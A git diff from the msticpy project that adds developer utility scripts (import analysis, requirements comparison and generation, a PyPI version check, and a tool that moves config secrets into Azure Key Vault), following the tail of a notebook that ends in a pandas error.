+      "\u001b[1;32m~\\AppData\\Local\\Temp/ipykernel_13684/24742320.py\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[0mquery_df\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mgroupby\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;34m\"Environment\"\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0masdict\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m",
+      "\u001b[1;32mF:\\anaconda\\envs\\msticpy\\lib\\site-packages\\pandas\\core\\groupby\\groupby.py\u001b[0m in \u001b[0;36m__getattr__\u001b[1;34m(self, attr)\u001b[0m\n\u001b[0;32m    909\u001b[0m             \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m[\u001b[0m\u001b[0mattr\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    910\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 911\u001b[1;33m         raise AttributeError(\n\u001b[0m\u001b[0;32m    912\u001b[0m             \u001b[1;34mf\"'{type(self).__name__}' object has no attribute '{attr}'\"\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    913\u001b[0m         )\n",
+      "\u001b[1;31mAttributeError\u001b[0m: 'DataFrameGroupBy' object has no attribute 'asdict'"
+     ]
+    }
+   ],
+   "source": [
+    "query_df.groupby(\"Environment\").asdict()"
+   ]
+  }
+ ],
+ "metadata": {
+  "hide_input": false,
+  "interpreter": {
+   "hash": "2bc37074a50de3994d4ebdf9197e864a43c9c15c9793b7f9f3363bcff9457253"
+  },
+  "kernelspec": {
+   "display_name": "Python (condadev)",
+   "language": "python",
+   "name": "python3"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.9.7"
+  },
+  "toc": {
+   "base_numbering": 1,
+   "nav_menu": {},
+   "number_sections": false,
+   "sideBar": true,
+   "skip_h1_title": false,
+   "title_cell": "Table of Contents",
+   "title_sidebar": "Contents",
+   "toc_cell": false,
+   "toc_position": {},
+   "toc_section_display": true,
+   "toc_window_display": false
+  },
+  "varInspector": {
+   "cols": {
+    "lenName": 16,
+    "lenType": 16,
+    "lenVar": 40
+   },
+   "kernels_config": {
+    "python": {
+     "delete_cmd_postfix": "",
+     "delete_cmd_prefix": "del ",
+     "library": "var_list.py",
+     "varRefreshCmd": "print(var_dic_list())"
+    },
+    "r": {
+     "delete_cmd_postfix": ") ",
+     "delete_cmd_prefix": "rm(",
+     "library": "var_list.r",
+     "varRefreshCmd": "cat(var_dic_list()) "
+    }
+   },
+   "types_to_exclude": [
+    "module",
+    "function",
+    "builtin_function_or_method",
+    "instance",
+    "_Feature"
+   ],
+   "window_display": false
+  },
+  "widgets": {
+   "application/vnd.jupyter.widget-state+json": {
+    "state": {},
+    "version_major": 2,
+    "version_minor": 0
+   }
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 4
+}
diff --git a/tools/analyze_imports.py b/tools/analyze_imports.py
new file mode 100644
index 000000000..efff5f69c
--- /dev/null
+++ b/tools/analyze_imports.py
@@ -0,0 +1,137 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Python file import analyzer."""
+import argparse
+import sys
+
+sys.path.append("./tools")
+
+# pylint: disable=wrong-import-position
+from toollib import VERSION  # noqa: E402
+from toollib.import_analyzer import analyze_imports  # noqa: E402
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+def _add_script_args():
+    parser = argparse.ArgumentParser(
+        description=f"Package imports analyer. v.{VERSION}"
+    )
+    parser.add_argument(
+        "--path",
+        "-p",
+        default=".",
+        required=True,
+        help="Path to folder containing package",
+    )
+    parser.add_argument(
+        "--package", "-k", required=True, help="Name of package (subfolder of --path)"
+    )
+    parser.add_argument(
+        "--req_file",
+        "-r",
+        default="requirements.txt",
+        help="Name of requirements.txt file",
+    )
+    parser.add_argument(
+        "--missing",
+        action="store_true",
+        default=True,
+        help="Show missing imports for modules",
+    )
+    parser.add_argument(
+        "--stdlib",
+        action="store_true",
+        default=False,
+        help="Show standard library imports for modules",
+    )
+    parser.add_argument(
+        "--reqs",
+        action="store_true",
+        default=False,
+        help="Show imports listed in requirements.txt",
+    )
+    parser.add_argument(
+        "--internal",
+        action="store_true",
+        default=False,
+        help="Show missing imports for modules",
+    )
+    parser.add_argument(
+        "--unknown",
+        action="store_true",
+        default=True,
+        help="Show unknown imports for modules",
+    )
+    parser.add_argument(
+        "--modules", action="store_true", default=False, help="Show imports by module."
+    )
+    parser.add_argument(
+        "--version", action="store_true", default=False, help="Show version."
+    )
+    parser.add_argument(
+        "--pkg_graph", action="store_true", default=False, help="Show dependency tree."
+    )
+    return parser
+
+
+def _print_single_module(mod_name, imps, p_args):
+    if p_args.pkg_graph:
+        if imps.setup_reqs:
+            print(f"{{'{mod_name}': {imps.setup_reqs}}}")
+        return
+    print(mod_name)
+    if p_args.internal and imps.internal:
+        print("internal imports:", end=" ")
+        print(imps.internal or "none")
+    if p_args.stdlib and imps.standard:
+        print("std lib imports:", end=" ")
+        print(imps.standard or "none")
+    if p_args.reqs and imps.setup_reqs:
+        print(f"external imports listed in {p_args.req_file}:", end=" ")
+        print(imps.setup_reqs or "none")
+    if p_args.missing and imps.missing_reqs:
+        print("missing imports (used but not in requirements):", end=" ")
+        print(imps.missing_reqs or "none")
+    if p_args.unknown and imps.unknown:
+        print("unknown imports:", end=" ")
+        print(imps.unknown or "none")
+
+
+def _print_all_imports(mod_imports, p_args):
+    if p_args.internal:
+        print("internal imports:", end=" ")
+        print(sorted({v for s in mod_imports.values() for v in s.internal}))
+    if p_args.stdlib:
+        print("std lib imports:", end=" ")
+        print(sorted({v for s in mod_imports.values() for v in s.standard}))
+    if p_args.reqs:
+        print(f"external imports listed in {args.req_file}:", end=" ")
+        print(sorted({v for s in mod_imports.values() for v in s.setup_reqs}))
+    if p_args.missing:
+        print("missing imports (used but not in requirements)", end=" ")
+        print(sorted({v for s in mod_imports.values() for v in s.missing_reqs}))
+    if p_args.unknown:
+        print("unknown imports:", end=" ")
+        print(sorted({v for s in mod_imports.values() for v in s.unknown}))
+
+
+# pylint: disable=invalid-name
+if __name__ == "__main__":
+    arg_parser = _add_script_args()
+    args = arg_parser.parse_args()
+    if args.version:
+        print(f"Version {VERSION}")
+
+    package_imports = analyze_imports(
+        args.path, args.package, req_file=args.req_file, process_setup_py=False
+    )
+    if args.modules:
+        for mod, imports in package_imports.items():
+            _print_single_module(mod, imports, args)
+    else:
+        _print_all_imports(package_imports, args)
diff --git a/tools/check_latest_ver.py b/tools/check_latest_ver.py
new file mode 100644
index 000000000..64ad9379f
--- /dev/null
+++ b/tools/check_latest_ver.py
@@ -0,0 +1,37 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+Check version of msticpy.
+
+Based on code from stackoverflow
+https://stackoverflow.com/questions/58648739/how-to-check-if-python
+-package-is-latest-version-programmatically/58650826#58650826
+"""
+
+# import sys
+from distutils.version import LooseVersion
+from importlib_metadata import version
+
+import httpx
+
+__author__ = "Ian Hellen, hoefling"
+
+
+# pylint: disable=invalid-name
+if __name__ == "__main__":
+    name = "msticpy"
+    installed_version = LooseVersion(version(name))
+
+    # fetch package metadata from PyPI
+    pypi_url = f"https://pypi.org/pypi/{name}/json"
+    pkg_data = httpx.get(pypi_url).json()
+    latest_version = pkg_data.get("info", {}).get("version", None)
+    if latest_version:
+        latest_version = LooseVersion(latest_version)
+    else:
+        latest_version = max(LooseVersion(s) for s in pkg_data["releases"].keys())
+
+    print("package:", name, "installed:", installed_version, "latest:", latest_version)
diff --git a/tools/comp_reqs.py b/tools/comp_reqs.py
new file mode 100644
index 000000000..a6540f592
--- /dev/null
+++ b/tools/comp_reqs.py
@@ -0,0 +1,66 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Compare two requirements files."""
+import argparse
+import re
+from packaging.version import parse
+from packaging.specifiers import SpecifierSet
+
+
+def _add_script_args(description):
+    parser = argparse.ArgumentParser(
+        description=description, formatter_class=argparse.RawDescriptionHelpFormatter
+    )
+    parser.add_argument("source", help="First requirements file to compare.")
+    parser.add_argument("target", help="Second requirements file to compare.")
+    return parser
+
+
+def _parse_line(line):
+    req_regex = r"(?P<pkg>[^~=<>,]+)(?P<op>[~=<>,]*)(?P<ver>.*)"
+
+    match = re.search(req_regex, line)
+    if match:
+        return match.groups()
+    return None, None, None
+
+
+def _parse_reqs(file):
+    with open(file, "r") as file_reqs:
+        req_lines = file_reqs.readlines()
+    p_lines = [_parse_line(line) for line in req_lines]
+    return {pkg: (op, ver) for pkg, op, ver in p_lines}
+
+
+# pylint: disable=invalid-name
+if __name__ == "__main__":
+    arg_parser = _add_script_args(description=__doc__)
+    args = arg_parser.parse_args()
+
+    src_dict = _parse_reqs(args.source)
+    tgt_dict = _parse_reqs(args.target)
+
+    src_only = {pkg for pkg in src_dict if pkg not in tgt_dict}
+    both = set(src_dict) - src_only
+
+    print(f"{len(src_only)} packages missing from target.")
+    print("\n".join(sorted(src_only)))
+    not_compat = []
+    compat = []
+    for pkg in sorted(both):
+        v2 = parse(tgt_dict[pkg][1])
+        spec1 = SpecifierSet(src_dict[pkg][0] + src_dict[pkg][1])
+        if v2 in spec1:
+            compat.append(f"Compatible: {pkg}, {src_dict[pkg]}, {tgt_dict[pkg]}")
+        else:
+            not_compat.append(
+                f"Not compatible: {pkg}, {src_dict[pkg]}, {tgt_dict[pkg]}"
+            )
+    print(
+        f"Common packages: {len(compat)} compatible, {len(not_compat)} not compatible."
+    )
+    print("\n".join(compat))
+    print("\n".join(not_compat))
diff --git a/tools/config2kv.py b/tools/config2kv.py
new file mode 100644
index 000000000..5effee251
--- /dev/null
+++ b/tools/config2kv.py
@@ -0,0 +1,325 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+Config2kv - extracts config-based secrets and stores them in KeyVault.
+
+The tool reads settings from the current msticpyconfig.yaml. It will read
+the current file specified by the MSTICPYCONFIG file or a path specified by
+the --path argument.
+
+For each provider secrets are extracted from the Args subkeys. Keyvault
+secrets are built using the pathname of the setting and the secret value.
+By default, most KeyVault settings are read from the settings file itself.
+These can be supplied by command line arguments. Commandline arguments
+will override settings in the config file.
+
+If the vault name specified does not exist in the subscription it will be
+created in the specified resource group and region. The secrets will then
+be stored in the vault using the name/secret pairs mentioned earlier.
+
+Finally, a version of the settings file, updated to reference the KeyVault
+values, is written to the file specified in the --output argument.
+
+--show will perform the parsing of the settings file but do not updates.
+--verbose will show more details of the changes that are being made.
+
+"""
+import argparse
+from copy import deepcopy
+import json
+import os
+from pathlib import Path
+from pprint import pprint
+import re
+import sys
+import yaml
+
+from msrestazure.azure_exceptions import CloudError
+
+from msticpy.common.keyvault_client import (
+    BHKeyVaultClient,
+    BHKeyVaultMgmtClient,
+    KeyVaultSettings,
+)
+from msticpy.common import pkg_config as config
+
+try:
+    from .toollib import VERSION  # type: ignore
+
+    __version__ = VERSION
+except ImportError:
+    pass
+
+__author__ = "Ian Hellen"
+
+
+_KV_PLACE_HOLDER = {"KeyVault": None}
+
+
+def _read_config_settings(conf_file):
+    sys_config = os.environ.get("MSTICPYCONFIG")
+
+    if not conf_file:
+        conf_file = sys_config
+    if not conf_file:
+        raise ValueError("Configuration file not found.")
+    print(conf_file)
+    with open(conf_file, "r") as conf_hdl:
+        cur_settings = yaml.safe_load(conf_hdl)
+
+    # temporarily set env var to point to conf_file
+    os.environ["MSTICPYCONFIG"] = conf_file
+    config.refresh_config()
+    kvlt_settings = KeyVaultSettings()
+    os.environ["MSTICPYCONFIG"] = sys_config
+    return cur_settings, kvlt_settings
+
+
+def _write_config_settings(conf_file, conf_settings, confirm):
+    if Path(conf_file).is_file():
+        print(f"Output file {conf_file} exists.")
+        if not _prompt_yn("Overwrite (y/n)? ", confirm):
+            return
+    yaml.SafeDumper.ignore_aliases = lambda *args: True
+    with open(conf_file, "w") as conf_hdl:
+        yaml.safe_dump(data=conf_settings, stream=conf_hdl)
+
+
+def _format_kv_name(setting_path):
+    """Return normalized name for use as a KeyVault secret name."""
+    return re.sub("[^0-9a-zA-Z-]", "-", setting_path)
+
+
+def _get_config_secrets(cur_settings, section_name, sec_names):  # noqa: MC0001
+    kv_dict = {}
+    sec_key_names = ["authkey", "apiid", "password", "clientsecret"]
+    if sec_names:
+        sec_key_names.extend(sec_names)
+    if section_name not in cur_settings:
+        return None, None
+    ud_settings = deepcopy(cur_settings[section_name])
+    for prov, setting in cur_settings[section_name].items():
+        if "Args" in setting:
+            arg_path = f"{section_name}.{prov}.Args"
+            for arg, arg_val in setting["Args"].items():
+                if arg.casefold() not in sec_key_names:
+                    continue
+                item_path = arg_path + "." + arg
+                if isinstance(arg_val, str):
+                    kv_dict[_format_kv_name(item_path)] = arg_val
+                elif isinstance(arg_val, dict):
+                    if "KeyVault" in arg_val:
+                        continue
+                    if "EnvironmentVar" in arg_val:
+                        env_var_name = arg_val["EnvironmentVar"]
+                        env_value = os.environ.get(env_var_name)
+                        kv_dict[_format_kv_name(item_path)] = env_value
+                ud_settings[prov]["Args"][arg] = _KV_PLACE_HOLDER
+    return kv_dict, ud_settings
+
+
+def _transform_settings(cur_settings, sec_names):
+    ud_settings = deepcopy(cur_settings)
+    kv_secrets_dict = {}
+
+    for section in ["TIProviders", "OtherProviders", "DataProviders"]:
+        kv_vals, section_settings = _get_config_secrets(
+            cur_settings, section, sec_names
+        )
+        if not kv_vals:
+            continue
+        kv_secrets_dict.update(kv_vals)
+        ud_settings[section] = section_settings
+    return ud_settings, kv_secrets_dict
+
+
+def _show_settings(secrets, ud_settings):
+    print("\nKV Secrets to update\n---------------------")
+    pprint(secrets, indent=2)
+    print("\nUpdated msticpyconfig\n---------------------")
+    print(json.dumps(ud_settings, indent=2))
+
+
+def _prompt_yn(mssg, confirm):
+    mssg = f"{mssg.strip()} "
+    if confirm:
+        resp = input(mssg)  # nosec
+        while resp.strip().casefold() not in ("y", "n"):
+            resp = input("Expected 'y' or 'n' response.")
+    else:
+        resp = "y"
+    return resp.casefold().startswith("y")
+
+
+def _add_secrets_to_vault(vault_name, secrets, confirm, **kwargs):
+    print("Vault management requires authentication")
+    kv_mgmt = BHKeyVaultMgmtClient(**kwargs)
+    vault_uri = None
+    try:
+        vault_uri = kv_mgmt.get_vault_uri(vault_name)
+        print(f"Vault {vault_name} found.")
+    except CloudError:
+        mssg = f"Vault {vault_name} not found. Create new vault (y/n)? "
+        if _prompt_yn(mssg, confirm):
+            print("Creating {vault_name}. Please wait...")
+            new_vault = kv_mgmt.create_vault(vault_name=vault_name)
+            vault_uri = new_vault.properties.vault_uri
+            print("New vault {vault_name} created")
+    if not vault_uri:
+        print("Vault name was not created. Aborting.")
+        return
+
+    mssg = f"Add secrets to vault {vault_name} (y/n)? "
+    print("Adding secrets to vault requires authentication")
+    if _prompt_yn(mssg, confirm):
+        kv_client = BHKeyVaultClient(vault_name=vault_name, **kwargs)
+        for sec_name, sec_value in secrets.items():
+            print(f"setting {sec_name}")
+            kv_client.set_secret(secret_name=sec_name, value=sec_value)
+        print("Done")
+        print("Secrets in vault:\n", "\n".join(kv_client.secrets))
+
+
+def _list_secrets(vault_name: str, confirm, **kwargs):
+    mssg = "Show secret values (y/n)? "
+    show_secrets = _prompt_yn(mssg, confirm)
+    kv_client = BHKeyVaultClient(vault_name=vault_name, **kwargs)
+    print(f"Secrets currently in vault {vault_name}")
+    for sec_name in kv_client.secrets:
+        sec_name = sec_name.rsplit("/", maxsplit=1)[-1]
+        print(f"Secret: {sec_name}", end=": ")
+        if show_secrets:
+            secret = kv_client.get_secret(secret_name=sec_name)
+            print(secret)
+        else:
+            print("************")
+    print("Done")
+
+
+def _add_script_args(description):
+    parser = argparse.ArgumentParser(
+        description=description, formatter_class=argparse.RawDescriptionHelpFormatter
+    )
+    parser.add_argument(
+        "--path",
+        "-p",
+        required=False,
+        help="Path to msticpyconfig.yaml. Defaults to using MSTICPYCONFIG env variable.",
+    )
+    parser.add_argument(
+        "--vault", "-v", help="Vault name. Default taken from msticpyconfig.yaml"
+    )
+    parser.add_argument(
+        "--tenant",
+        "-t",
+        help="Tenant name or ID. Default taken from msticpyconfig.yaml",
+    )
+    parser.add_argument(
+        "--sub", "-s", help="Subscription ID. Default taken from msticpyconfig.yaml"
+    )
+    parser.add_argument(
+        "--group",
+        "-g",
+        help=(
+            "Resource Group name. Default taken from msticpyconfig.yaml"
+            + "(only needed if creating new vault.)"
+        ),
+    )
+    parser.add_argument(
+        "--region",
+        "-r",
+        help=(
+            "Azure region. Default taken from msticpyconfig.yaml "
+            + "(only needed if creating new vault.)"
+        ),
+    )
+    parser.add_argument(
+        "--secnames",
+        "-n",
+        nargs="+",
+        help=(
+            "Add an additional list of secret names to search for in "
+            + "the config file. Defaults are "
+            + "'AuthKey', 'ApiID', 'password' and 'clientsecret'. "
+            + "(the names are case-insensitive)"
+        ),
+    )
+    parser.add_argument(
+        "--existing",
+        "-e",
+        action="store_true",
+        default=False,
+        help=("Use the named existing vault. Do not try to create."),
+    )
+    parser.add_argument(
+        "--list",
+        "-l",
+        action="store_true",
+        default=False,
+        help=("View current secrets."),
+    )
+    parser.add_argument(
+        "--show",
+        action="store_true",
+        default=False,
+        help=("View changes that would be made without doing anything."),
+    )
+    parser.add_argument(
+        "--verbose",
+        action="store_true",
+        default=False,
+        help=("Print out more details."),
+    )
+    parser.add_argument(
+        "--output", "-o", help=("Output file path to save updated msticpyconfig.yaml")
+    )
+    parser.add_argument(
+        "--yes",
+        "-y",
+        action="store_true",
+        default=False,
+        help="Suppresses prompts for confirmation. Answers 'y' to all",
+    )
+    return parser
+
+
+# pylint: disable=invalid-name
+if __name__ == "__main__":
+    arg_parser = _add_script_args(description=__doc__)
+    args = arg_parser.parse_args()
+
+    curr_settings, kv_settings = _read_config_settings(conf_file=args.path)
+    vault = args.vault or kv_settings["vaultname"]
+    kv_args = {
+        "tenant_id": args.tenant or kv_settings["tenantid"],
+        "subscription_id": args.sub or kv_settings["subscriptionid"],
+        "resource_group": args.group or kv_settings["resourcegroup"],
+        "azure_region": args.region or kv_settings["azureregion"],
+        "settings": kv_settings,
+    }
+
+    prompt = not args.yes
+    if args.list:
+        _list_secrets(vault_name=vault, confirm=prompt, **kv_args)
+        sys.exit(0)
+
+    new_settings, kv_secrets = _transform_settings(curr_settings, args.secnames)
+    if args.show or args.verbose:
+        _show_settings(kv_secrets, new_settings)
+        sys.exit(0)
+
+    if not kv_secrets:
+        print("No secrets found in config file. No action to take.")
+        sys.exit(0)
+    if not args.show:
+        if not args.output:
+            raise ValueError("No output file specified. --output value is required.")
+        _add_secrets_to_vault(
+            vault_name=vault, secrets=kv_secrets, confirm=prompt, **kv_args
+        )
+        _write_config_settings(
+            conf_file=args.output, conf_settings=new_settings, confirm=prompt
+        )
diff --git a/tools/create_reqs_all.py b/tools/create_reqs_all.py
new file mode 100644
index 000000000..df0890816
--- /dev/null
+++ b/tools/create_reqs_all.py
@@ -0,0 +1,224 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Requirements file writer from setup.py extras."""
+import argparse
+import difflib
+import sys
+from importlib import import_module
+from pathlib import Path
+from typing import List
+
+from pkg_resources import Requirement, parse_requirements
+from setuptools.config import read_configuration
+
+VERSION = "1.0.0"
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+_PIPFILE_TEMPLATE = """
+[[source]]
+url = "https://pypi.org/simple"
+verify_ssl = true
+name = "pypi"
+
+[packages]
+{packages}
+
+[dev-packages]
+{dev_packages}
+
+[requires]
+python_version = "{py_ver}"
+"""
+
+
+def _add_script_args():
+    """Define script arguments."""
+    parser = argparse.ArgumentParser(
+        description=f"Requirements sync script. v.{VERSION}"
+    )
+    parser.add_argument(
+        "--req-all-path",
+        "-r",
+        default="./requirements-all.txt",
+        required=False,
+        help="Path of requirements-all.txt file",
+    )
+    parser.add_argument(
+        "--pipfile",
+        "-i",
+        default=False,
+        action="store_true",
+        required=False,
+        help="Generate a Pipfile",
+    )
+    parser.add_argument(
+        "--pyver",
+        "-y",
+        default="3.8",
+        required=False,
+        help="Python version to use in the generated Pipfile",
+    )
+    parser.add_argument(
+        "--setup-path",
+        "-s",
+        default="./setup.py",
+        required=False,
+        help="Path of setup.py to process.",
+    )
+    parser.add_argument(
+        "--diff",
+        "-d",
+        required=False,
+        default=True,
+        action="store_true",
+        help="Print diffs, don't write file.",
+    )
+    parser.add_argument(
+        "--print",
+        "-p",
+        required=False,
+        action="store_true",
+        help="Print new requirements, don't write file.",
+    )
+    return parser
+
+
+def _read_reqs_file(file) -> List[Requirement]:
+    """Return parsed requirements from requirements file."""
+    reqs_file = Path(file)
+    if reqs_file.is_file():
+        reqs_text = reqs_file.read_text(encoding="utf-8")
+        return list(
+            parse_requirements(
+                req.strip()
+                for req in sorted(reqs_text.split("\n"))
+                if req.strip() and not req.strip().startswith("#")
+            )
+        )
+    return []
+
+
+def _compare_reqs(new: List[Requirement], current: List[Requirement]) -> List[str]:
+    """Return diff of two requirements lists."""
+    new_list = [str(req) for req in new]
+    curr_list = [str(req) for req in current]
+    return list(
+        difflib.context_diff(
+            sorted(new_list),
+            sorted(curr_list),
+            fromfile="Updated",
+            tofile="Current",
+        )
+    )
+
+
+def _write_requirements(file_name, requirements: List[Requirement]):
+    """Write requirements file."""
+    Path(file_name).write_text(
+        "\n".join(str(req) for req in requirements), encoding="utf-8"
+    )
+
+
+def _get_pyver_from_setup(setup_cfg: str = "setup.cfg") -> str:
+    """Read the Python version required from setup.cfg."""
+    settings = read_configuration(setup_cfg)
+    return str(settings["options"]["python_requires"])
+
+
+def _create_pipfile(
+    reqs: List[Requirement], reqs_dev: List[Requirement], py_ver: str
+) -> str:
+    """Return the text of a Pipfile."""
+    packages = [f'{req.name} = "{req.specifier}"' for req in reqs]
+    dev_packages = [f'{req.name} = "{req.specifier}"' for req in reqs_dev]
+    return _PIPFILE_TEMPLATE.format(
+        packages="\n".join(packages),
+        dev_packages="\n".join(dev_packages),
+        py_ver=py_ver,
+    )
+
+
+def _get_extras_from_setup(
+    extra: str = "all",
+    include_base: bool = False,
+) -> List[Requirement]:
+    """
+    Return list of extras from setup.py.
+
+    Parameters
+    ----------
+    extra : str, optiona
+        The name of the extra to return, by default "all"
+    include_base : bool, optional
+        If True include install_requires, by default False
+
+    Returns
+    -------
+    List[Requirement]
+        List of package requirements.
+
+    Notes
+    -----
+    Duplicated from tools/toollib/import_analyzer.py
+
+    """
+    setup_mod = import_module("setup")
+    extras = getattr(setup_mod, "EXTRAS").get(extra)
+    if include_base:
+        base_install = getattr(setup_mod, "INSTALL_REQUIRES")
+        extras.extend(
+            [req.strip() for req in base_install if not req.strip().startswith("#")]
+        )
+    return list(parse_requirements(sorted(list(set(extras)), key=str.casefold)))
+
+
+# pylint: disable=invalid-name
+if __name__ == "__main__":
+    arg_parser = _add_script_args()
+    args = arg_parser.parse_args()
+
+    all_reqs = _get_extras_from_setup(
+        extra="all",
+        include_base=True,
+    )
+    dev_reqs = _read_reqs_file("requirements-dev.txt")
+
+    if args.print:
+        print("requirements-all.txt")
+        print("--------------------")
+        print("\n".join(str(req) for req in all_reqs))
+        print(all_reqs)
+        if args.pipfile:
+            print("\nPipfile")
+            print("--------")
+            print(_create_pipfile(reqs=all_reqs, reqs_dev=dev_reqs, py_ver=args.pyver))
+        sys.exit(0)
+
+    existing_reqs = _read_reqs_file(args.req_all_path)
+    diff_reqs = _compare_reqs(new=all_reqs, current=existing_reqs)
+
+    if args.diff:
+        # If we just wanted to check for a diff, finish here
+        if diff_reqs:
+            print("\n".join(diff.strip() for diff in diff_reqs))
+            sys.exit(1)
+        print("No differences for requirements-all.txt")
+        sys.exit(0)
+
+    # If the requirements lists differ
+    if diff_reqs:
+        _write_requirements(file_name=args.req_all_path, requirements=all_reqs)
+
+    # We may need to create and write a Pipfile
+    if args.pipfile and diff_reqs or not Path(args.pipfile).is_file():
+        pipfile_text = _create_pipfile(
+            reqs=all_reqs, reqs_dev=dev_reqs, py_ver=args.pyver
+        )
+        Path("Pipfile").write_text(pipfile_text, encoding="utf-8")
+    sys.exit(0)
diff --git a/tools/misc/chk_pkgs.py b/tools/misc/chk_pkgs.py
new file mode 100644
index 000000000..2b3eb06b0
--- /dev/null
+++ b/tools/misc/chk_pkgs.py
@@ -0,0 +1,112 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Test script for checking package version alignment."""
+import re
+
+KQL_REQUIRES = [
+    "ipython>=7.23.1",
+    "ipykernel>=5.1.1",
+    "plotly>=3.10.0",
+    "prettytable>=0.7.2",
+    "matplotlib>=3.0.0",
+    "pandas>=1.1.5",
+    "adal>=1.2.1",
+    "Pygments>=2.2.0",
+    "seaborn>=0.9.0",
+    "httpx==0.18",
+    "python-dateutil>=2.7.5",
+    "traitlets>=4.3.2",
+    "psutil>=5.4.7",
+    "six>=1.11.0",
+    "setuptools>=41.0.1",
+    "Markdown>=3.0.1",
+    "beautifulsoup4>=4.6.3",
+    "lxml>=4.2.5",
+    "pytz>=2019.1",
+    "pyjwt>=1.7.1",
+]
+
+
+PKG_VER_PATTERN = r"([\w\-_]+)\s*([><=]{2})\s*([\d.]+)"
+
+
+def extract_pkgs(req_file=None, pkg_reqs=None):
+    """Get reqs from requirements.txt."""
+    if req_file is not None:
+        with open(req_file, "r") as req_fh:
+            pkg_reqs = req_fh.readlines()
+    if not pkg_reqs:
+        return {}
+    pkg_dict = {}
+    for line in pkg_reqs:
+        req_match = re.match(PKG_VER_PATTERN, line)
+        if not req_match:
+            print(f"Failed on {line}")
+        pkg_dict[req_match.groups()[0]] = (req_match.groups()[1], req_match.groups()[2])
+    return pkg_dict
+
+
+BH_PATH = "E:/temp/pkg_comp/bluehound-req.txt"
+MP_PATH = "E:/src/microsoft/msticpy/msticpy/requirements.txt"
+
+BH_REQS = extract_pkgs(req_file=BH_PATH)
+MP_REQS = extract_pkgs(req_file=MP_PATH)
+KM_REQS = extract_pkgs(pkg_reqs=KQL_REQUIRES)
+
+
+def solve_all(ver1, op1, ver2, op2):
+    """Solve conflicts in both directions."""
+    ver_ok, problem = solve(ver1, op1, ver2, op2)
+    if not ver_ok:
+        return ver_ok, problem
+    return solve(ver1=ver2, op1=op2, ver2=ver1, op2=op1)
+
+
+def solve(ver1, op1, ver2, op2):
+    """Solve conflicts."""
+    ver1_t = tuple(ver1.split("."))
+    ver2_t = tuple(ver2.split("."))
+    if op1 == "==":
+        if op2 == "==":
+            return ver1_t == ver2_t, f"{ver1} != {ver2}"
+        if op2 == ">=":
+            return ver1_t >= ver2_t, f"{ver1} < {ver2}"
+    return True, ""
+
+
+def check_conflicts(src_pkg, dest_pkg):
+    """Check conflicts in between packages."""
+    conflicts = []
+    compats = []
+    matches = []
+    for pkg, ver in src_pkg.items():
+        if pkg in dest_pkg:
+            ver2 = dest_pkg[pkg]
+            if ver[1] == dest_pkg[pkg][1]:
+                matches.append(pkg)
+            else:
+                ver_ok, mssg = solve_all(ver[1], ver[0], ver2[1], ver2[0])
+                if ver_ok:
+                    compats.append((pkg, ver, dest_pkg[pkg]))
+                else:
+                    conflicts.append((pkg, ver, dest_pkg[pkg], mssg))
+    print(f"Matched version: {matches}")
+    if conflicts:
+        print("Conflicts (pkg, ver_pkg1, ver_pkg2, mssg)")
+        for conflict in conflicts:
+            print(conflict)
+    if compats:
+        print("Compatible (pkg, ver_pkg1, ver_pkg2)")
+        for compat in compats:
+            print(compat)
+
+
+print("msticpy vs. bluehound")
+check_conflicts(MP_REQS, BH_REQS)
+print("\nmsticpy vs. kqlmagic")
+check_conflicts(MP_REQS, KM_REQS)
+print("\nbluehound vs. kqlmagic")
+check_conflicts(BH_REQS, KM_REQS)
diff --git a/tools/mp_demo_data.py b/tools/mp_demo_data.py
new file mode 100644
index 000000000..078552d88
--- /dev/null
+++ b/tools/mp_demo_data.py
@@ -0,0 +1,264 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Demo QueryProvider."""
+from functools import partial
+from pathlib import Path
+import pickle  # nosec
+from typing import List, Dict, Union, Any, Iterable
+from time import sleep
+
+import pandas as pd
+import yaml
+
+from msticpy.data.data_providers import QueryContainer
+from msticpy.data import QueryProvider
+
+
+# pylint: disable=too-few-public-methods
+class _DataDriver:
+    """Demo data provider."""
+
